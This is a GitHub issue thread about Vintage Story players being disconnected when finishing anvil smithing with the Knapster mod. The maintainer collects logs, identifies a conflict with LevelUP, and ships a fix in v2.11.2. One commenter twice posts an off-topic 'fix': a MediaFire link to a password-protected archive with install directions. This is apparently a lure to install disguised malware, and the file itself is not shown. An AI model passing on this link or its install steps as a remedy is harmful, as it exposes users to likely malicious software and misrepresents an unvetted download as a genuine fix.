### ISSUE TITLE
Players booted from server when anvil smithing

### ISSUE THREAD

**Issue by ashyvaane** [ApacheTech-VintageStory-Mods/Knapster#22]
Hello! Players on my server are being kicked off the server when they try to do the final strike on anvil smithing projects. I've attached a txt. file with the related error - from the start of the anvil project to after they've been kicked offline.

[smithing error.txt](https://github.com/user-attachments/files/16830811/smithing.error.txt)

Please let me know if there are other details you need. Thank you!!

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ApacheTech** [comment]
I will need a list of all the mods you use on the server, as well as all your log files, from the client, and the server, so that I can see what patches other mods apply, and in what order.

**Comment by ApacheTech** [comment]
For the log files, you can just log into the server, log back out, and then zip your entire logs folder, and send it. That will give the best picture of the working state of the server.

**Comment by ashyvaane** [comment]
Server Logs: [Server Logs.gz](https://github.com/user-attachments/files/16831079/Server.Logs.gz)

Client logs from the player who's been kicked (nobody else is anvil smithing yet):

[Client Logs.zip](https://github.com/user-attachments/files/16831073/Client.Logs.zip)

**Comment by ApacheTech** [comment]
Wonderful, thanks. I'll look into this as soon as I can.

**Comment by ashyvaane** [comment]
It is a heavily modded server, our load is currently 84 mods. I tried zipping the whole thing straight from the server, but I can't upload it here as it's too large. How would you like me to send it to you instead?

**Comment by ApacheTech** [comment]
It's ok. I just need the logs.

**Comment by ApacheTech** [comment]
I'm sifting through the logs. As a side-note, the mods `danatweaks`, and `spawnersapi` are both throwing a lot of errors. It might be worth passing the client logs zip onto them, so they can see the errors being thrown.

I think this reported bug is a compatibility issue with Knapster, and LevelUP. Which is unsurprising. We play around in the same areas with the anvil. I can add a quick-fix for it now, and continue to look for a proper solution for the long-term.

**Comment by ApacheTech** [comment]
Released: [v2.11.2](https://mods.vintagestory.at/knapster)

**Comment by ashyvaane** [comment]
Thank you for letting me know about those other two, I wasn't sure what I was seeing there so that's super helpful!!

And thank you for the fix!
